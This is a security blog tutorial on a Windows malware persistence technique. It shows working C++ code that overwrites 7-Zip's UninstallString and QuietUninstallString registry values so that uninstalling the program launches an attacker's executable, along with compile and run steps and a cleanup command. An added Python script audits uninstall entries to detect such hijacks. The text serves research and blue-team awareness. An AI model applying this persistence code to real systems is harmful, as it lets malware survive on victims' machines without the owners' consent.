
Hello, cybersecurity enthusiasts and white hackers!


This post is the result of my own research into one of the more interesting malware persistence tricks: hijacking the uninstall entry of a target application.

uninstallation process

When you install a program on a Windows system, it usually registers its own uninstaller. These entries live in the registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>

and

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\QuietUninstallString\<application name>

So what is the trick? Nothing prevents these commands from being replaced with ones that run any other program. When a user executes the uninstaller, the command of the attacker's choosing is executed. Again, the good news is that elevated privileges are required to modify these entries, since they reside under the HKLM key.

practical example

Let’s look at a practical example. Firstly, let’s choose a target application. I chose 7-zip x64:


Then, check the registry key values for correctness:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /s


Also, I prepared my evil application. As usual, it's the meow-meow "malware" :)


Then I create a program which implements my persistence logic (pers.cpp):

/*
pers.cpp
windows persistence via
hijacking uninstall app
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html
*/
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // target app: its entry under the Uninstall key (HKLM, so admin rights are needed to write it)
  const char* app = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\7-zip";

  // evil app
  const char* exe = "C:\\Users\\User\\Documents\\malware\\2022-10-04-malware-pers-13\\hack.exe";

  // open the app's uninstall key for writing
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0, KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update registry key values; equivalent to:
    // reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "...\hack.exe" /f
    // for REG_SZ the size passed to RegSetValueEx must include the terminating null byte
    DWORD size = (DWORD)strlen(exe) + 1;
    res = RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (const BYTE*)exe, size);
    if (res == ERROR_SUCCESS) {
      res = RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (const BYTE*)exe, size);
    }
    RegCloseKey(hkey);
  }

  return res == ERROR_SUCCESS ? 0 : 1;
}

As you can see, the logic is simple: we just update the target key values in the registry.

demo

Let's see everything in action. Compile the malware and the persistence program:

x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


And run it on the victim's machine, Windows 10 x64 in my case:

.\pers.exe


Finally, after rebooting my system, I tried to uninstall 7-zip:


Then I looked at the properties of hack.exe in Process Hacker 2:


As you can see, the parent process is SystemSettings.exe, which is what you see whenever you open Windows Settings. In our case, it is add/remove programs. Perfect! =^..^=

There is one little caveat. When I tried to update the key with the path Z:\2022-10-04-malware-pers-13\hack.exe, I got an error like this:


Maybe you can only use paths on the C:\ drive.

After the experiments, clean up:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f
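A defender-side check for this technique, added here and not part of the original post: it parses the output of the `reg query ... /s` command used above and flags UninstallString / QuietUninstallString values whose executable lies outside the expected install roots (or outside the entry's own InstallLocation). The sample output and the list of trusted roots are constructed assumptions; tune the roots for your own estate.

```python
import re

# Constructed sample of `reg query "HKLM\...\Uninstall" /s` output (not captured from a real host).
# The first entry reproduces the hijacked state from this post; the second is a benign entry.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip
    DisplayName    REG_SZ    7-Zip 22.01 (x64)
    InstallLocation    REG_SZ    C:\Program Files\7-Zip\
    UninstallString    REG_SZ    C:\Users\User\Documents\malware\2022-10-04-malware-pers-13\hack.exe
    QuietUninstallString    REG_SZ    C:\Users\User\Documents\malware\2022-10-04-malware-pers-13\hack.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ExampleApp
    DisplayName    REG_SZ    Example App (constructed)
    UninstallString    REG_SZ    "C:\Program Files\ExampleApp\uninstall.exe" /S
"""

# Directories a machine-wide (HKLM) uninstaller is normally expected to live under; assumed list.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\",
                 "c:\\programdata\\package cache\\")
CHECKED_VALUES = ("UninstallString", "QuietUninstallString")
# reg query prints values as: <indent>Name<4 spaces>REG_TYPE<4 spaces>Data (data may be empty)
VALUE_RE = re.compile(r"^\s+(\S+)\s{2,}(REG_\w+)(?:\s{2,}(.*))?$")


def parse_reg_query(text):
    """Parse `reg query /s` text into {key_path: {value_name: data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                keys[current][m.group(1)] = m.group(3) or ""
    return keys


def executable_from_command(command):
    """Return the program path of an uninstall command (quoted or bare), without its arguments."""
    command = command.strip()
    if not command:
        return ""
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split()[0]


def audit_uninstall_keys(text):
    """Return (key, value_name, exe) for commands outside the trusted roots and the InstallLocation."""
    findings = []
    for key, values in parse_reg_query(text).items():
        install_dir = values.get("InstallLocation", "").strip('"').lower()
        for name in CHECKED_VALUES:
            if name not in values:
                continue
            exe = executable_from_command(values[name])
            low = exe.lower()
            in_root = any(low.startswith(root) for root in TRUSTED_ROOTS)
            in_install = bool(install_dir) and low.startswith(install_dir)
            if not (in_root or in_install):
                findings.append((key, name, exe))
    return findings
```

Feed it the real output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s` to sweep every installed application at once.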


conclusion

Of course, this trick may not be so great for persistence, since it requires privileges and the participation of the victim's user. But why not?

There is one more trick that uses installing and removing programs for persistence; I will write about it in a future post. I'm still investigating this possibility for the red team.

I hope this post spreads awareness of this interesting technique among blue teamers, and adds a weapon to the red teamers' arsenal.

RegOpenKeyEx
RegSetValueEx
RegCloseKey
reg query
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and goodbye!
PS. All drawings and screenshots are mine.